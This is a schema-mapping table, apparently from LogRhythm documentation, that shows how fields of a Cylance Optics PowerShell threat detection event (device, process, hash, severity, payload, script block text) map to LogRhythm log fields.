|V 2.0 : Cylance Optics : Powershell Threat Detect||Base Rule||General Threat Message||Activity|
Mapping with LogRhythm Schema
|Device Key in Log Message||LogRhythm Schema||Data Type||Schema Description|
|Description||<policy>||Text/String||The name of the Detection Rule that was triggered.|
|Device ID||<serialnumber>||Text/String||The unique ID for the device.|
|Device Name||<dname>||Text/String||The name of the device on which the Detection Event occurred.|
|Event ID||N/A||N/A||The unique ID for the Detection Event.|
|Event Name||N/A||N/A||The Detection Event involved a Target File.|
|Event Type||<vmid>||Text/String||The Detection Event involved a Target File.|
|Instigating Process Image File Sha256||<hash>||Text/String||The SHA256 hash of the process that instigated the action.|
|Instigating Process Name||<process>||Text/String||The name of the process that instigated the action.|
|Instigating Process Owner||<domainorigin>, <login>||Text/String||The user who owns the process that instigated the action.|
|Severity||<severity>||Text/String||The severity of the event.|
High: A malicious event that requires immediate attention.
Medium: A suspicious event that should be reviewed.
Low: An important event, but may not be malicious.
Info: An observed event.
|Payload||N/A||N/A||The Powershell modules and/or arguments that were passed into the Powershell interpreter.|
|Payload Length||N/A||N/A||The length of the observed Powershell Payload field.|
|Script Block Length||<size>||Number||The length of the observed Powershell Script Block Text field.|
|Script Block Text||<command>||Text/String||The content of a Powershell script or module that was loaded or executed by the Powershell interpreter.|
|Zone Names||N/A||N/A||The zones to which the device belongs.|